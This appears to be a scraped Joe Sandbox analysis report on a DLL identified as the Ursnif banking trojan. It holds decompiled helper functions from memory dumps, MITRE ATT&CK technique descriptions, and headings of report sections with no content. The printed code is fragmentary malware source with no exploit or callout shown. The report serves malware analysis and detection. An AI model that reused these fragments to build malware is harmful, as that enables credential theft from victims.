0x00f4917a
0x00f49185

APIs

Part of subcall function 00F43727: RtlAllocateHeap.NTDLL(00000000,00000000,00F443D1), ref: 00F43733

Part of subcall function 00F444A8: wsprintfA.USER32 ref: 00F44504

lstrlen.KERNEL32(00F459DA,00000000,00000000,00000027,00000005,00000000,00000000,00F493BE,74666F53,00000000,00F459DA,00F4D00C,?,00F459DA), ref: 00F49147
lstrcpy.KERNEL32(00000000,00000000), ref: 00F4916B
lstrcat.KERNEL32(00000000,00000000), ref: 00F49173

Strings

Soft, xrefs: 00F4911D, 00F49136

Memory Dump Source

Source File: 00000002.00000002.1030677795.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000002.00000002.1030663345.0000000000F40000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030698611.0000000000F4C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1030711367.0000000000F4D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030724379.0000000000F4F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f40000_regsvr32.jbxd

Similarity

API ID: AllocateHeaplstrcatlstrcpylstrlenwsprintf
String ID: Soft
API String ID: 393707159-3753413193
Opcode ID: b9f2783d939de68a52c133b8d1d68808d78201cd9c68b0c24018f3dbed61a53f
Instruction ID: 5aef19836a7a6cba64b58618bc0a537c844c97f135d4a3954054c117802828fa
Opcode Fuzzy Hash: b9f2783d939de68a52c133b8d1d68808d78201cd9c68b0c24018f3dbed61a53f
Instruction Fuzzy Hash: 9B01F23620420AB7CB126BA89C88EAF3F69AF85364F004020FD0595112DBB88945A3E1

Uniqueness

Uniqueness Score: -1.00%

Function 00F448FE, Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F448FE(void* __esi) {
				struct _SECURITY_ATTRIBUTES* _v4;
				void* _t8;
				void* _t10;

				_v4 = 0;
				memset(__esi, 0, 0x38);
				_t8 = CreateEventA(0, 1, 0, 0);
				 *(__esi + 0x1c) = _t8;
				if(_t8 != 0) {
					_t10 = CreateEventA(0, 1, 1, 0);
					 *(__esi + 0x20) = _t10;
					if(_t10 == 0) {
						CloseHandle( *(__esi + 0x1c));
					} else {
						_v4 = 1;
					}
				}
				return _v4;
			}

0x00f44908
0x00f4490c
0x00f44921
0x00f44925
0x00f44928
0x00f4492e
0x00f44932
0x00f44935
0x00f44940
0x00f44937
0x00f44937
0x00f44937
0x00f44935
0x00f4494e

APIs

memset.NTDLL ref: 00F4490C
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,73BB81D0), ref: 00F44921
CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 00F4492E
CloseHandle.KERNEL32(?), ref: 00F44940

Memory Dump Source

Source File: 00000002.00000002.1030677795.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000002.00000002.1030663345.0000000000F40000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030698611.0000000000F4C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1030711367.0000000000F4D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030724379.0000000000F4F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f40000_regsvr32.jbxd

Similarity

API ID: CreateEvent$CloseHandlememset
String ID:
API String ID: 2812548120-0
Opcode ID: 43338dcf735c778c8ddc439b936ed8184089e99a6b4c5ae32efe14912eeb4959
Instruction ID: 241e2a61ac94e22bceb27212089eb7ef85f011c97c45b95ba2045bd982885e6f
Opcode Fuzzy Hash: 43338dcf735c778c8ddc439b936ed8184089e99a6b4c5ae32efe14912eeb4959
Instruction Fuzzy Hash: 1BF03AF150530CBFD3209F26DCC092BBBACFB462E8B11492DF44292111DA75AC19AAB0

Uniqueness

Uniqueness Score: -1.00%

Function 00F440BB, Relevance: 6.0, APIs: 4, Instructions: 29
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E00F440BB(void** __esi) {
				char* _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				intOrPtr _t11;
				void* _t12;
				void** _t14;

				_t14 = __esi;
				_t4 =  *0xf4d32c; // 0x57395b0
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0xf4d32c; // 0x57395b0
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t14;
				if(_t8 != 0 && _t8 != 0xf4d030) {
					HeapFree( *0xf4d238, 0, _t8);
				}
				_t14[1] = E00F49A54(_v0, _t14);
				_t11 =  *0xf4d32c; // 0x57395b0
				_t12 = _t11 + 0x40;
				__imp__(_t12);
				return _t12;
			}

0x00f440bb
0x00f440bb
0x00f440c4
0x00f440d4
0x00f440d4
0x00f440d9
0x00f440de
0x00000000
0x00000000
0x00f440ce
0x00f440ce
0x00f440e0
0x00f440e4
0x00f440f6
0x00f440f6
0x00f44106
0x00f44109
0x00f4410e
0x00f44112
0x00f44118

APIs

RtlEnterCriticalSection.NTDLL(05739570), ref: 00F440C4
Sleep.KERNEL32(0000000A,?,00F459CF), ref: 00F440CE
HeapFree.KERNEL32(00000000,00000000,?,00F459CF), ref: 00F440F6
RtlLeaveCriticalSection.NTDLL(05739570), ref: 00F44112

Memory Dump Source

Source File: 00000002.00000002.1030677795.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000002.00000002.1030663345.0000000000F40000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030698611.0000000000F4C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1030711367.0000000000F4D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030724379.0000000000F4F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f40000_regsvr32.jbxd

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: ff7b11c82f469fa9a0032965a07a7b72563cf9f4209c197a1a6bbb162fb8e582
Instruction ID: 6079880a053c5a101fd2ca007a22a46c239fadf00453e1650fc56e26bbe25468
Opcode Fuzzy Hash: ff7b11c82f469fa9a0032965a07a7b72563cf9f4209c197a1a6bbb162fb8e582
Instruction Fuzzy Hash: 9EF03478A05244DBE7209F7CDC49B167BA4AF26740B008410FE01E72A1C634E810FB26

Uniqueness

Uniqueness Score: -1.00%

Function 00F49426, Relevance: 6.0, APIs: 4, Instructions: 29
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F49426() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0xf4d26c; // 0x29c
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0xf4d2b8; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0xf4d26c; // 0x29c
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0xf4d238; // 0x5340000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}

0x00f49426
0x00f4942d
0x00f49477
0x00f49479
0x00f49479
0x00f49431
0x00f49437
0x00f4943c
0x00f49440
0x00f49446
0x00f4944d
0x00000000
0x00000000
0x00f4944f
0x00f49454
0x00000000
0x00000000
0x00000000
0x00f49454
0x00f49456
0x00f4945e
0x00f49461
0x00f49461
0x00f49467
0x00f4946e
0x00f49471
0x00f49471
0x00000000

APIs

SetEvent.KERNEL32(0000029C,00000001,00F480D9), ref: 00F49431
SleepEx.KERNEL32(00000064,00000001), ref: 00F49440
CloseHandle.KERNEL32(0000029C), ref: 00F49461
HeapDestroy.KERNEL32(05340000), ref: 00F49471

Memory Dump Source

Source File: 00000002.00000002.1030677795.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000002.00000002.1030663345.0000000000F40000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030698611.0000000000F4C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1030711367.0000000000F4D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030724379.0000000000F4F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f40000_regsvr32.jbxd

Similarity

API ID: CloseDestroyEventHandleHeapSleep
String ID:
API String ID: 4109453060-0
Opcode ID: 72e77de273171c495996b8eac2e881352de08f998012f7bb56c032b63318c89d
Instruction ID: 02f0f95901d42f92045abeca5e8338047263fe1b66221397ed40cc860a5bad18
Opcode Fuzzy Hash: 72e77de273171c495996b8eac2e881352de08f998012f7bb56c032b63318c89d
Instruction Fuzzy Hash: C9F01C79B0A319DBE7609BB9EC48B173B98AB22B61B448610BD51D72B0CAA4C941B590

Uniqueness

Uniqueness Score: -1.00%

Function 00F43E16, Relevance: 6.0, APIs: 4, Instructions: 28
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00F43E16() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0xf4d32c; // 0x57395b0
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0xf4d32c; // 0x57395b0
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0xf4d32c; // 0x57395b0
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0xf4e836) {
					HeapFree( *0xf4d238, 0, _t10);
					_t7 =  *0xf4d32c; // 0x57395b0
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}

0x00f43e16
0x00f43e1f
0x00f43e2f
0x00f43e2f
0x00f43e34
0x00f43e39
0x00000000
0x00000000
0x00f43e29
0x00f43e29
0x00f43e3b
0x00f43e40
0x00f43e44
0x00f43e57
0x00f43e5d
0x00f43e5d
0x00f43e66
0x00f43e68
0x00f43e6c
0x00f43e72

APIs

RtlEnterCriticalSection.NTDLL(05739570), ref: 00F43E1F
Sleep.KERNEL32(0000000A,?,00F459CF), ref: 00F43E29
HeapFree.KERNEL32(00000000,?,?,00F459CF), ref: 00F43E57
RtlLeaveCriticalSection.NTDLL(05739570), ref: 00F43E6C

Memory Dump Source

Source File: 00000002.00000002.1030677795.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000002.00000002.1030663345.0000000000F40000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030698611.0000000000F4C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1030711367.0000000000F4D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030724379.0000000000F4F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f40000_regsvr32.jbxd

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: 32fa7dbe6d2aca8757891d08e98ead9a11c323513e847e2805441bf66017f0df
Instruction ID: 39af3aee004fd5570e00c6da63469e098a49eb7ba52ca750776836c8cf140275
Opcode Fuzzy Hash: 32fa7dbe6d2aca8757891d08e98ead9a11c323513e847e2805441bf66017f0df
Instruction Fuzzy Hash: B0F0DA7CA02104DBE7148F29EC49E257BA4EB2A700B448015EC02DB361C738EC04FA21

Uniqueness

Uniqueness Score: -1.00%

Function 00F414E8, Relevance: 5.1, APIs: 4, Instructions: 70
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00F414E8(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E00F43727(_t2);
				if(_t34 != 0) {
					_t30 = E00F43727(_t28);
					if(_t30 == 0) {
						E00F46EF8(_t34);
					} else {
						_t39 = _a4;
						_t22 = E00F4A8B9(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E00F4A8B9(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}

0x00f414e8
0x00f414f2
0x00f414f4
0x00f414fa
0x00f414fa
0x00f41503
0x00f41507
0x00f41513
0x00f41517
0x00f4158b
0x00f41519
0x00f41519
0x00f4151d
0x00f41524
0x00f41527
0x00f41541
0x00f41530
0x00f41530
0x00f41534
0x00f41537
0x00f4153c
0x00f4153c
0x00f41546
0x00f4156e
0x00f41574
0x00f41577
0x00f41548
0x00f4154a
0x00f41552
0x00f4155d
0x00f41562
0x00f41562
0x00f4157e
0x00f41585
0x00f41586
0x00f41586
0x00f41517
0x00f41596

APIs

lstrlen.KERNEL32(00000000,00000008,?,73B74D40,?,?,00F47CEA,?,?,?,?,00000102,00F4461F,?,?,00000000), ref: 00F414F4

Part of subcall function 00F43727: RtlAllocateHeap.NTDLL(00000000,00000000,00F443D1), ref: 00F43733

Part of subcall function 00F4A8B9: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,00F41522,00000000,00000001,00000001,?,?,00F47CEA,?,?,?,?,00000102), ref: 00F4A8C7
Part of subcall function 00F4A8B9: StrChrA.SHLWAPI(?,0000003F,?,?,00F47CEA,?,?,?,?,00000102,00F4461F,?,?,00000000,00000000), ref: 00F4A8D1

memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,00F47CEA,?,?,?,?,00000102,00F4461F,?), ref: 00F41552
lstrcpy.KERNEL32(00000000,00000000), ref: 00F41562
lstrcpy.KERNEL32(00000000,00000000), ref: 00F4156E

Memory Dump Source

Source File: 00000002.00000002.1030677795.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000002.00000002.1030663345.0000000000F40000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030698611.0000000000F4C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1030711367.0000000000F4D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030724379.0000000000F4F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f40000_regsvr32.jbxd

Similarity

API ID: lstrcpy$AllocateHeaplstrlenmemcpy
String ID:
API String ID: 3767559652-0
Opcode ID: 6f919eca2d406d665f9fd94d9e2c0fa0cd8df116a0b9b00e95384ac6564cdcfe
Instruction ID: 2ff160f83907bdc265bb8b8361ebe235a4c5cd603dadffd0da0ae16fa06d799e
Opcode Fuzzy Hash: 6f919eca2d406d665f9fd94d9e2c0fa0cd8df116a0b9b00e95384ac6564cdcfe
Instruction Fuzzy Hash: 9021A276904255EBCB019F68CC84BEE7FB8EF46390B084054FC059B202D734DA51A7E1

Uniqueness

Uniqueness Score: -1.00%

Function 00F4737F, Relevance: 5.0, APIs: 4, Instructions: 39
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F4737F(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E00F43727(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}

0x00f47394
0x00f47398
0x00f473a2
0x00f473a9
0x00f473ac
0x00f473ae
0x00f473b6
0x00f473bb
0x00f473c9
0x00f473ce
0x00f473d8

APIs

lstrlenW.KERNEL32(004F0053,73B75520,?,00000008,0573937C,?,00F43B9F,004F0053,0573937C,?,?,?,?,?,?,00F49F20), ref: 00F4738F
lstrlenW.KERNEL32(00F43B9F,?,00F43B9F,004F0053,0573937C,?,?,?,?,?,?,00F49F20), ref: 00F47396

Part of subcall function 00F43727: RtlAllocateHeap.NTDLL(00000000,00000000,00F443D1), ref: 00F43733

memcpy.NTDLL(00000000,004F0053,73B769A0,?,?,00F43B9F,004F0053,0573937C,?,?,?,?,?,?,00F49F20), ref: 00F473B6
memcpy.NTDLL(73B769A0,00F43B9F,00000002,00000000,004F0053,73B769A0,?,?,00F43B9F,004F0053,0573937C), ref: 00F473C9

Memory Dump Source

Source File: 00000002.00000002.1030677795.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000002.00000002.1030663345.0000000000F40000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030698611.0000000000F4C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1030711367.0000000000F4D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030724379.0000000000F4F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f40000_regsvr32.jbxd

Similarity

API ID: lstrlenmemcpy$AllocateHeap
String ID:
API String ID: 2411391700-0
Opcode ID: 275fcb5dbae08fe12257d72c76d8e1b14254c3ffa553a1bdf6be96712fe58293
Instruction ID: f8a129d8779eeee139392d812ef5108bf03e47ebba2e6c54a31e95c7a551dcb8
Opcode Fuzzy Hash: 275fcb5dbae08fe12257d72c76d8e1b14254c3ffa553a1bdf6be96712fe58293
Instruction Fuzzy Hash: 79F0E176900118BB8B11DF99CC45C9E7BADEE093947154062FD04D7112E775DA159BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00F441B9, Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(05739978,00000000,00000000,745EC740,00F498A8,00000000), ref: 00F441C9
lstrlen.KERNEL32(?), ref: 00F441D1

Part of subcall function 00F43727: RtlAllocateHeap.NTDLL(00000000,00000000,00F443D1), ref: 00F43733

lstrcpy.KERNEL32(00000000,05739978), ref: 00F441E5
lstrcat.KERNEL32(00000000,?), ref: 00F441F0

Memory Dump Source

Source File: 00000002.00000002.1030677795.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000002.00000002.1030663345.0000000000F40000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030698611.0000000000F4C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1030711367.0000000000F4D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030724379.0000000000F4F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f40000_regsvr32.jbxd

Similarity

API ID: lstrlen$AllocateHeaplstrcatlstrcpy
String ID:
API String ID: 74227042-0
Opcode ID: ca7cfb178507173ab361297848d76a104a003e7e065a80bd14f1525f66d99b24
Instruction ID: 832f7c8a791e1ce34f483df8b9d5eac400efe52bf7ded6cb102a38fa10de4ca6
Opcode Fuzzy Hash: ca7cfb178507173ab361297848d76a104a003e7e065a80bd14f1525f66d99b24
Instruction Fuzzy Hash: 72E0D877A02225A78711DFE8AC48C5FBBACEFEA7617040416FE00D3120C724D901EBE1

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary.
Tactics:	Defense Evasion
Data Sources:	Loaded DLLs, Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report laka4.dll

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Ursnif

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Exports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

